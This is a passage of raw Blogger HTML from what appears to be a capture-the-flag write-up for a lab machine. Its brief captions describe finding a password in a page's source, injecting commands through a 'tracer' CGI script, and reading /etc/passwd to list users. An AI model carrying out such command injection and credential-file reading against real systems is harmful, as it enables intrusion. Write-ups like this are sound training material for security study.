src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvpvV8OiqFqlsDS00Y1iDOfbMWm9r_ZpYS07lSrOHtCRXpl1gNPF80Et2FzQEMFY_2Gxyyt_DNV37Nj1nrfnPWldKM8z8twruZF6NvGssysRsFqcwj8ehfLWB_DzUP8FWI-JYYJNtCRSwk/s16000/screenshot.24.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- &lt;b&gt;robots.txt &lt;/b&gt;points to two cgi scripts:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjS-YRJKA6RwH6ZDsGt3qQHYVYi0-orLzLQBB3rhweWulDkMmEfZDOtOXEebq9-nSQAgTf3s3b5WevP9HvXC_UmxaYyEEeVX4cWW1AKCQSZ87jyWb2bLV8hMTOJNOvyiPLFxfhuY3X1TRi1/&quot; style=&quot;clear: left; display: inline; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;211&quot; data-original-width=&quot;672&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjS-YRJKA6RwH6ZDsGt3qQHYVYi0-orLzLQBB3rhweWulDkMmEfZDOtOXEebq9-nSQAgTf3s3b5WevP9HvXC_UmxaYyEEeVX4cWW1AKCQSZ87jyWb2bLV8hMTOJNOvyiPLFxfhuY3X1TRi1/s16000/screenshot.25.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Going to webpage &lt;b&gt;passwords&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLvA9I36i8CGSh-ZO-nBYyjhw9i6BibiF_ODPyiHcsLf9vumuuDWpJ_vKbZkJGDyyNZBGirZ0Epnsqi77Uvr5A1qF7B5Totf6YEbzmVKkldxJQanm9PjXOq9KtuJVsfO2QLCXUlbU3WmWJ/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;387&quot; data-original-width=&quot;642&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLvA9I36i8CGSh-ZO-nBYyjhw9i6BibiF_ODPyiHcsLf9vumuuDWpJ_vKbZkJGDyyNZBGirZ0Epnsqi77Uvr5A1qF7B5Totf6YEbzmVKkldxJQanm9PjXOq9KtuJVsfO2QLCXUlbU3WmWJ/s16000/screenshot.26.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading a 10 points &lt;b&gt;FLAGS (50/130)&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmhsDupVElUisRRut18ZiE7FiwweVdCuramV5L53HioX5PwUBuZ_zvJcZGQxZNvSbqmQvv5LwEx92G2ch3p3pabo15K6rb75EWhY7angxA0nI7dc4F8a2cC6wboO24yuNfvDk5UNOCZO4g/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;139&quot; data-original-width=&quot;537&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmhsDupVElUisRRut18ZiE7FiwweVdCuramV5L53HioX5PwUBuZ_zvJcZGQxZNvSbqmQvv5LwEx92G2ch3p3pabo15K6rb75EWhY7angxA0nI7dc4F8a2cC6wboO24yuNfvDk5UNOCZO4g/s16000/screenshot.27.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Also, there are directions for a password that could be hidden:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipaXZiCYXYjq_QwXMlzhxsj54oM6dAGfSqs-NKXAyxVqJNKSHLBwP2Av1MXls95OByB6t-zLk2c9HWE4JkS_wtDdiqZxItLnX2AsFNXm17DDmuLfehx75XcJcqHf-HHjULXihWAF0bmWJM/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;245&quot; data-original-width=&quot;846&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipaXZiCYXYjq_QwXMlzhxsj54oM6dAGfSqs-NKXAyxVqJNKSHLBwP2Av1MXls95OByB6t-zLk2c9HWE4JkS_wtDdiqZxItLnX2AsFNXm17DDmuLfehx75XcJcqHf-HHjULXihWAF0bmWJM/s16000/screenshot.28.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Just viewing the source we find the password &lt;b&gt;winter&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeE5EiPChzD1R42yYLIrd_u0wxPLglHpJvmiAtM9bJgNilQRgYSt8mocxOdo1mtWBKIuHQhbRRBtDw2HX1h5F4O6GkZihH0dQaNFcgPRzbALXOZ1aXkJWM7eOdt_Oe6EnjZnBIl0abitf1/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;308&quot; data-original-width=&quot;559&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeE5EiPChzD1R42yYLIrd_u0wxPLglHpJvmiAtM9bJgNilQRgYSt8mocxOdo1mtWBKIuHQhbRRBtDw2HX1h5F4O6GkZihH0dQaNFcgPRzbALXOZ1aXkJWM7eOdt_Oe6EnjZnBIl0abitf1/s16000/screenshot.29.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- First cgi script is under construction:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSv4vc91GMrhfZQCHf3c_xdjbypGeDBjtcijR4Ldswa5jn7m2nsrP8kbACYQQ-fF6mx5EzdlrriltxtLfJGEJT1qeuXzDOJhMVOwdYOo1Dgp7kLS3uNDs-UG1olX4K03Srxp9Komsz70h5/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;138&quot; data-original-width=&quot;533&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSv4vc91GMrhfZQCHf3c_xdjbypGeDBjtcijR4Ldswa5jn7m2nsrP8kbACYQQ-fF6mx5EzdlrriltxtLfJGEJT1qeuXzDOJhMVOwdYOo1Dgp7kLS3uNDs-UG1olX4K03Srxp9Komsz70h5/s16000/screenshot.30.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Second cgi script leads to a tracer:&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjQfkEvlWZy-AI_RG9J9mIx_HdbGXgvMkAznLRbm2wRiXBmS2H06ZB6mMiIuRo_1kXJP6oRNfa4JOlCEQcB-b5KoHDFRFBIxf59_Q9dQ4k1vSP1Juwgh36ZY2U4-2fBe_jhAX5pvOtHFla/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;276&quot; data-original-width=&quot;569&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjQfkEvlWZy-AI_RG9J9mIx_HdbGXgvMkAznLRbm2wRiXBmS2H06ZB6mMiIuRo_1kXJP6oRNfa4JOlCEQcB-b5KoHDFRFBIxf59_Q9dQ4k1vSP1Juwgh36ZY2U4-2fBe_jhAX5pvOtHFla/s16000/screenshot.31.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Trying to run commands at the tracer, it works with &lt;b&gt;id&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTbxfKaOTj-2I-wWyJF3qA2a6NqHsPDc_hNOu9pAnb026H_YNTg2qOOSM2UrffO-ry8uWoJQ776H8w7vLgopLzfyUv2wXHUn4_YMCnVEqdQKkYeUuZoCBqF2ut1x3Cm9ye2Z5R-G7pb-pU/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;267&quot; data-original-width=&quot;570&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTbxfKaOTj-2I-wWyJF3qA2a6NqHsPDc_hNOu9pAnb026H_YNTg2qOOSM2UrffO-ry8uWoJQ776H8w7vLgopLzfyUv2wXHUn4_YMCnVEqdQKkYeUuZoCBqF2ut1x3Cm9ye2Z5R-G7pb-pU/s16000/screenshot.32.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSrZg7bn7qanCNA9pP7IgpM98eI2zBMMshYC_xkEYoE3b5AMPBa_7mwQmgFOU-Eb90gaNU_QVQYJB8K1cuT8eZ4c28xP6GAcNEipBzsW8yS06AKMq8Lr8j6_MOe7rK8oWmKZ5EnkT42r09/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;304&quot; data-original-width=&quot;634&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSrZg7bn7qanCNA9pP7IgpM98eI2zBMMshYC_xkEYoE3b5AMPBa_7mwQmgFOU-Eb90gaNU_QVQYJB8K1cuT8eZ4c28xP6GAcNEipBzsW8yS06AKMq8Lr8j6_MOe7rK8oWmKZ5EnkT42r09/s16000/screenshot.33.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- &lt;b&gt;cat &lt;/b&gt;and &lt;b&gt;more&lt;/b&gt; provide &lt;b&gt;/etc/passwd&lt;/b&gt;, where we learn about users &lt;b&gt;RickSanchez, Morty &lt;/b&gt;and &lt;b&gt;Summer&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4U-VN5MVZhp9LgIIk-oC0HhCERk_XSXCme0WZiGPNgtRpK08YtHIv0NaL8OJvBKYcl6Akxa2QQjEuIX-aTSfza_pL4MDcGKdK3dQPpEX1vzspenJX6qYL6OB9F16p89Oay4ga2GOYgCkF/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;268&quot; data-original-width=&quot;566&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4U-VN5MVZhp9LgIIk-oC0HhCERk_XSXCme0WZiGPNgtRpK08YtHIv0NaL8OJvBKYcl6Akxa2QQjEuIX-aTSfza_pL4MDcGKdK3dQPpEX1vzspenJX6qYL6OB9F16p89Oay4ga2GOYgCkF/s16000/screenshot.34.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7MQhiOzf6_kXYO0Tfi7yi8sSF1KJ_Fmjfw3-y4BTkhfzELU6GAOod8BxbR25KmY5syUfecf73vwKllQiP8ixCHfJDUHMn-Vr0DZeKMhbT5i8ns09FJh18i7iTI9k3kRlFciLGmnqOLy3-/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;568&quot; data-original-width=&quot;600&quot; 